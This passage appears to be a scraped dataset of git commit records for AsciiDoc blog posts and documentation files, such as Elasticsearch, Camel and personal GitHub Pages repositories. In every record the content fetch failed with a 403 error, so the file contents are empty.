emin\/elasticsearch,mnylen\/elasticsearch,hirdesh2008\/elasticsearch,MaineC\/elasticsearch,mapr\/elasticsearch,wittyameta\/elasticsearch,ThalaivaStars\/OrgRepo1,adrianbk\/elasticsearch,amit-shar\/elasticsearch,bestwpw\/elasticsearch,cnfire\/elasticsearch-1,fekaputra\/elasticsearch,MjAbuz\/elasticsearch,andrejserafim\/elasticsearch,abibell\/elasticsearch,drewr\/elasticsearch,markllama\/elasticsearch,artnowo\/elasticsearch,markharwood\/elasticsearch,mbrukman\/elasticsearch,MjAbuz\/elasticsearch,strapdata\/elassandra,phani546\/elasticsearch,Helen-Zhao\/elasticsearch,hydro2k\/elasticsear
ch,huypx1292\/elasticsearch,andrejserafim\/elasticsearch,drewr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,Collaborne\/elasticsearch,lzo\/elasticsearch-1,mjason3\/elasticsearch,kevinkluge\/elasticsearch,LeoYao\/elasticsearch,Shekharrajak\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,weipinghe\/elasticsearch,mikemccand\/elasticsearch,jpountz\/elasticsearch,ivansun1010\/elasticsearch,amaliujia\/elasticsearch,andrestc\/elasticsearch,wangyuxue\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,kimimj\/elasticsearch,easonC\/elasticsearch,henakamaMSFT\/elasticsearch,infusionsoft\/elasticsearch,djschny\/elasticsearch,ThalaivaStars\/OrgRepo1,strapdata\/elassandra-test,HarishAtGitHub\/elasticsearch,diendt\/elasticsearch,winstonewert\/elasticsearch,wimvds\/elasticsearch,PhaedrusTheGreek\/elasticsearch,luiseduardohdbackup\/elasticsearch,yuy168\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,strapdata\/elassandra,mgalushka\/elasticsearch,artnowo\/elasticsearch,bawse\/elasticsearch,martinstuga\/elasticsearch,sneivandt\/elasticsearch,hechunwen\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,NBSW\/elasticsearch,LewayneNaidoo\/elasticsearch,hydro2k\/elasticsearch,MetSystem\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,szroland\/elasticsearch,Charlesdong\/elasticsearch,camilojd\/elasticsearch,ESamir\/elasticsearch,luiseduardohdbackup\/elasticsearch,areek\/elasticsearch,mbrukman\/elasticsearch,Siddartha07\/elasticsearch,kunallimaye\/elasticsearch,iantruslove\/elasticsearch,dpursehouse\/elasticsearch,weipinghe\/elasticsearch,petabytedata\/elasticsearch,zeroctu\/elasticsearch,yynil\/elasticsearch,Brijeshrpatel9\/elasticsearch,huanzhong\/elasticsearch,LewayneNaidoo\/elasticsearch,truemped\/elasticsearch,fekaputra\/elasticsearch,acchen97\/elasticsearch,Widen\/elasticsearch,amit-shar\/elasticsearch,MichaelLiZhou\/elasticsearch,sdauletau\/elasticsearch,mortonsykes\/elasticsearch,sreeramjayan\/elasticsearch,Ansh90\/elasticsearch,jango2015\/elasticsearch,Ansh90\/elasticsearch,amit-shar\/elasticsearch,MichaelLiZhou\/elasticsearch,mrorii\/elasticsearch,Fsero\/elasticsearch,jprante\/elasticsearch,vietlq\/elasticsearch,dataduke\/elasticsearch,beiske\/elasticsearch,AshishThakur\/elasticsearch,infusionsoft\/elasticsearch,kaneshin\/elasticsearch,himanshuag\/elasticsearch,beiske\/elasticsearch,jbertouch\/elasticsearch,yuy168\/elasticsearch,ouyangkongtong\/elasticsearch,mute\/elasticsearch,robin13\/elasticsearch,petabytedata\/elasticsearch,yongminxia\/elasticsearch,vietlq\/elasticsearch,Brijeshrpatel9\/elasticsearch,jpountz\/elasticsearch,mcku\/elasticsearch,jimczi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,likaiwalkman\/elasticsearch,likaiwalkman\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,clintongormley\/elasticsearch,jbertouch\/elasticsearch,jbertouch\/elasticsearch,cwurm\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nrkkalyan\/elasticsearch,truemped\/elasticsearch,fekaputra\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,Widen\/elasticsearch,apepper\/elasticsearch,sarwarbhuiyan\/elasticsearch,wangyuxue\/elasticsearch,petabytedata\/elasticsearch,rmuir\/elasticsearch,Charlesdong\/elasticsearch,vroyer\/elassandra,wuranbo\/elasticsearch,mjhennig\/elasticsearch,chirilo\/elasticsearch,socialrank\/elasticsearch,iamjakob\/elasticsearch,jeteve\/elasticsearch,wimvds\/elasticsearch,sposam\/elastics
earch,pritishppai\/elasticsearch,Shekharrajak\/elasticsearch,loconsolutions\/elasticsearch,dylan8902\/elasticsearch,zhiqinghuang\/elasticsearch,fforbeck\/elasticsearch,dongjoon-hyun\/elasticsearch,strapdata\/elassandra-test,kalburgimanjunath\/elasticsearch,lks21c\/elasticsearch,diendt\/elasticsearch,vingupta3\/elasticsearch,btiernay\/elasticsearch,bestwpw\/elasticsearch,Uiho\/elasticsearch,xpandan\/elasticsearch,vroyer\/elasticassandra,elancom\/elasticsearch,bestwpw\/elasticsearch,xpandan\/elasticsearch,koxa29\/elasticsearch,JackyMai\/elasticsearch,szroland\/elasticsearch,YosuaMichael\/elasticsearch,mapr\/elasticsearch,tsohil\/elasticsearch,clintongormley\/elasticsearch,mmaracic\/elasticsearch,mm0\/elasticsearch,queirozfcom\/elasticsearch,sdauletau\/elasticsearch,slavau\/elasticsearch,kenshin233\/elasticsearch,strapdata\/elassandra5-rc,milodky\/elasticsearch,bawse\/elasticsearch,kunallimaye\/elasticsearch,polyfractal\/elasticsearch,spiegela\/elasticsearch,geidies\/elasticsearch,ouyangkongtong\/elasticsearch,fekaputra\/elasticsearch,NBSW\/elasticsearch,mohit\/elasticsearch,nellicus\/elasticsearch,lightslife\/elasticsearch,xuzha\/elasticsearch,infusionsoft\/elasticsearch,Fsero\/elasticsearch,rajanm\/elasticsearch,schonfeld\/elasticsearch,sc0ttkclark\/elasticsearch,rento19962\/elasticsearch,hirdesh2008\/elasticsearch,polyfractal\/elasticsearch,pritishppai\/elasticsearch,thecocce\/elasticsearch,Charlesdong\/elasticsearch,jango2015\/elasticsearch,tsohil\/elasticsearch,skearns64\/elasticsearch,dataduke\/elasticsearch,martinstuga\/elasticsearch,ESamir\/elasticsearch,queirozfcom\/elasticsearch,Shepard1212\/elasticsearch,rlugojr\/elasticsearch,sc0ttkclark\/elasticsearch,naveenhooda2000\/elasticsearch,tahaemin\/elasticsearch,easonC\/elasticsearch,fred84\/elasticsearch,truemped\/elasticsearch,mbrukman\/elasticsearch,awislowski\/elasticsearch,clintongormley\/elasticsearch,obourgain\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,wittyameta\/elasticsearch,uschindler\/elasticsearch,mute\/elasticsearch,petabytedata\/elasticsearch,kingaj\/elasticsearch,jpountz\/elasticsearch,EasonYi\/elasticsearch,snikch\/elasticsearch,dongjoon-hyun\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,yanjunh\/elasticsearch,Brijeshrpatel9\/elasticsearch,mohit\/elasticsearch,ulkas\/elasticsearch,dongjoon-hyun\/elasticsearch,davidvgalbraith\/elasticsearch,yongminxia\/elasticsearch,nomoa\/elasticsearch,rhoml\/elasticsearch,KimTaehee\/elasticsearch,ckclark\/elasticsearch,Liziyao\/elasticsearch,khiraiwa\/elasticsearch,markllama\/elasticsearch,humandb\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,tkssharma\/elasticsearch,Chhunlong\/elasticsearch,jpountz\/elasticsearch,ouyangkongtong\/elasticsearch,gmarz\/elasticsearch,kalburgimanjunath\/elasticsearch,iamjakob\/elasticsearch,mortonsykes\/elasticsearch,jbertouch\/elasticsearch,overcome\/elasticsearch,vvcephei\/elasticsearch,pranavraman\/elasticsearch,wbowling\/elasticsearch,vingupta3\/elasticsearch,zkidkid\/elasticsearch,sreeramjayan\/elasticsearch,yanjunh\/elasticsearch,zeroctu\/elasticsearch,chirilo\/elasticsearch,wangtuo\/elasticsearch,awislowski\/elasticsearch,robin13\/elasticsearch,YosuaMichael\/elasticsearch,markwalkom\/elasticsearch,ulkas\/elasticsearch,kimimj\/elasticsearch,palecur\/elasticsearch,ydsakyclguozi\/elasticsearch,tebriel\/elasticsearch,Ansh90\/elasticsearch,nazarewk\/elasticsearch,apepper\/elasticsearch,Collaborne\/elasticsearch,StefanGor\/elasticsearch,hydro2k\/elasticsearch,karthikjaps\/elasticsearch,nrkkalyan\/elasticsearch,
i-am-Nathan\/elasticsearch,Uiho\/elasticsearch,geidies\/elasticsearch,Liziyao\/elasticsearch,Stacey-Gammon\/elasticsearch,vvcephei\/elasticsearch,nilabhsagar\/elasticsearch,kenshin233\/elasticsearch,cnfire\/elasticsearch-1,weipinghe\/elasticsearch,kubum\/elasticsearch,sneivandt\/elasticsearch,milodky\/elasticsearch,fforbeck\/elasticsearch,ouyangkongtong\/elasticsearch,TonyChai24\/ESSource,mbrukman\/elasticsearch,elancom\/elasticsearch,mm0\/elasticsearch,mm0\/elasticsearch,apepper\/elasticsearch,hafkensite\/elasticsearch,elancom\/elasticsearch,alexbrasetvik\/elasticsearch,schonfeld\/elasticsearch,camilojd\/elasticsearch,Widen\/elasticsearch,strapdata\/elassandra,SaiprasadKrishnamurthy\/elasticsearch,kaneshin\/elasticsearch,springning\/elasticsearch,wbowling\/elasticsearch,C-Bish\/elasticsearch,lchennup\/elasticsearch,vroyer\/elasticassandra,pablocastro\/elasticsearch,liweinan0423\/elasticsearch,humandb\/elasticsearch,kingaj\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,zhiqinghuang\/elasticsearch,skearns64\/elasticsearch,nezirus\/elasticsearch,himanshuag\/elasticsearch,lks21c\/elasticsearch,socialrank\/elasticsearch,MetSystem\/elasticsearch,wuranbo\/elasticsearch,qwerty4030\/elasticsearch,ckclark\/elasticsearch,LewayneNaidoo\/elasticsearch,dylan8902\/elasticsearch,pranavraman\/elasticsearch,yynil\/elasticsearch,socialrank\/elasticsearch,mgalushka\/elasticsearch,JervyShi\/elasticsearch,luiseduardohdbackup\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,masterweb121\/elasticsearch,caengcjd\/elasticsearch,alexbrasetvik\/elasticsearch,strapdata\/elassandra5-rc,onegambler\/elasticsearch,vvcephei\/elasticsearch,yuy168\/elasticsearch,huypx1292\/elasticsearch,lydonchandra\/elasticsearch,strapdata\/elassandra-test,amaliujia\/elasticsearch,jpountz\/elasticsearch,infusionsoft\/elasticsearch","old_file":"docs\/plugins\/delete-by-query.asciidoc","new_file":"docs\/plugins\/delete-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c9e6812ea38805c84e66edb0d758250f7b949c5","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a39647b7a3582f7859b14fada05f0d7a2c0443e3","subject":"Fix link typo and remove dead link","message":"Fix link typo and remove dead link\n","repos":"mstahv\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework","old_file":"documentation\/articles\/IntegrationExperiences.asciidoc","new_file":"documentation\/articles\/IntegrationExperiences.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"31e272dfccdb7308612604cc7e917bd2a5a158bf","subject":"Update 2015-09-2-Daisies-arent-roses.adoc","message":"Update 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-2-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d48dd51366920445f5cf927dfaea43a33b025f","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a7e498649f58ba36eea913478913f0acd1d4e8","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3d68a9d923708477f6ca232beaa96292610cf98","subject":"Update 2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","message":"Update 2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","new_file":"_posts\/2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbb414e2a72a744a95f57b236cd88fcd58b7a062","subject":"y2b create post 3 Cool Tech Deals - #2","message":"y2b create post 3 Cool Tech Deals - #2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-03-3-Cool-Tech-Deals--2.adoc","new_file":"_posts\/2015-06-03-3-Cool-Tech-Deals--2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75805856182e8f7699d6e00f944f490e51dc97d3","subject":"Update 2015-09-17-JXLS-Reporting-Excel.adoc","message":"Update 
2015-09-17-JXLS-Reporting-Excel.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-09-17-JXLS-Reporting-Excel.adoc","new_file":"_posts\/2015-09-17-JXLS-Reporting-Excel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a6f02bb1660c00e6913d9a92a4208511b0db259","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6ed9ac863ee30528e3a27154a3d50cb0e261778","subject":"Update 2018-06-01-FW4SPL-1610-released.adoc","message":"Update 2018-06-01-FW4SPL-1610-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-06-01-FW4SPL-1610-released.adoc","new_file":"_posts\/2018-06-01-FW4SPL-1610-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72ef8e362bd8f32644bb95ab0ee1933d3dc96c90","subject":"minor fix @mszopos","message":"minor fix @mszopos\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/publications\/2017-05-21-stokesbc.adoc","new_file":"_posts\/publications\/2017-05-21-stokesbc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9288905ce9b8e02e61824cf8b81e3ff9af6a238f","subject":"Add the stickler-passenger-config man page","message":"Add the stickler-passenger-config man page","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"man\/stickler-passenger-config.asciidoc","new_file":"man\/stickler-passenger-config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1d705de2612e455ab20704fbe544248e65ed8d1","subject":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","message":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7877c67c6c59d101dbdc071856d320fb8dbc18d","subject":"Aggiunte un paio di 
note","message":"Aggiunte un paio di note\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8e84da4c4d3b8fb046a87f56ac9783a9cfd40fd8","subject":"Benchmarker report mentions logging level used. Contributed by Matej \u010cimbora.","message":"Benchmarker report mentions logging level used. Contributed by Matej \u010cimbora.\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de81123201e66eddc82b8b70c7a4e458225211f","subject":"v.194","message":"v.194\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"996531de7df94ec61911dd66394aa6a020afaaf9","subject":"y2b create post MacBook Air Core i5 Unboxing (July 2011)","message":"y2b create post MacBook Air Core i5 Unboxing (July 2011)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-21-MacBook-Air-Core-i5-Unboxing-July-2011.adoc","new_file":"_posts\/2011-07-21-MacBook-Air-Core-i5-Unboxing-July-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e63f07b63f7e3e31dc303aee94732fe5cc2b905","subject":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","message":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c6eb959a16cdc7d38e219bdcc521dfac8b1cb623","subject":"Added Endpoint completer to adoc","message":"Added Endpoint completer to adoc\n","repos":"pmoerenhout\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,pmoerenhout\/camel,gnodet\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,punkhorn\/camel-upstream,mcollovati\/camel,adessaigne\/camel,kevinearls\/camel,gnodet\/camel,tadayosi\/camel,cunningt\/camel,tadayosi\/camel,ullgren\/camel,objectiser\/camel,Fabryprog\/camel,alvinkwekel\/camel,tdiesler\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,kevinearls\/camel,tadayosi\/camel,tdiesler\/camel,kevinearls\/camel,cunningt\/camel,alvinkwekel\/camel,alvinkwekel\/camel,DariusX\/camel,apache\/camel,nicolaferraro\/camel,CodeSmell\/camel,Fabryprog\/camel,nicolaferraro\/camel,adessaigne\/camel,christophd\/camel,davidkarlsen\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,nikhilvibhav\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,objectiser\/camel,christophd\/camel,apache\/camel,christophd\/camel,zregvart\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,objectiser\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,ullgren\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,DariusX\/camel,alvinkwekel\/camel,zregvart\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,Fabryprog\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,DariusX\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,zregvart\/camel,apache\/camel,pax95\/camel,CodeSmell\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,cunningt\/camel,cunningt\/camel,zregvart\/camel,nikhilvibhav\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39b49a2123f6f0063efae194526d9c42837754bc","subject":"Update 2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","message":"Update 2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","new_file":"_posts\/2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7e8d60bd8b5e6e043be230efdded1f573f94bbc","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 
2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c65587b6f7784400b46715f102b656307b44a83","subject":"Update 2015-06-29-Im-joining-4finance.adoc","message":"Update 2015-06-29-Im-joining-4finance.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-06-29-Im-joining-4finance.adoc","new_file":"_posts\/2015-06-29-Im-joining-4finance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1736f5dbc8a6b60aff5abc0a961127c619a47763","subject":"Update 2015-10-01-Daisies-arent-roses.adoc","message":"Update 2015-10-01-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63dcd5f1d657c89ea7c0518b707c9b482430c966","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5357dc7102f26292090c4286968ec7869bc7d132","subject":"Create 2015-10-15-forge-2.20.0.final.asciidoc","message":"Create 2015-10-15-forge-2.20.0.final.asciidoc\n","repos":"forge\/docs,luiz158\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-10-15-forge-2.20.0.final.asciidoc","new_file":"news\/2015-10-15-forge-2.20.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b1cab21f18ddb43eb557f72332c69ef079d75a32","subject":"y2b create post Targus Versavu Keyboard Case for iPad 3 (3rd Gen) Unboxing \\u0026 Overview","message":"y2b create post Targus Versavu Keyboard Case for iPad 3 (3rd Gen) Unboxing \\u0026 
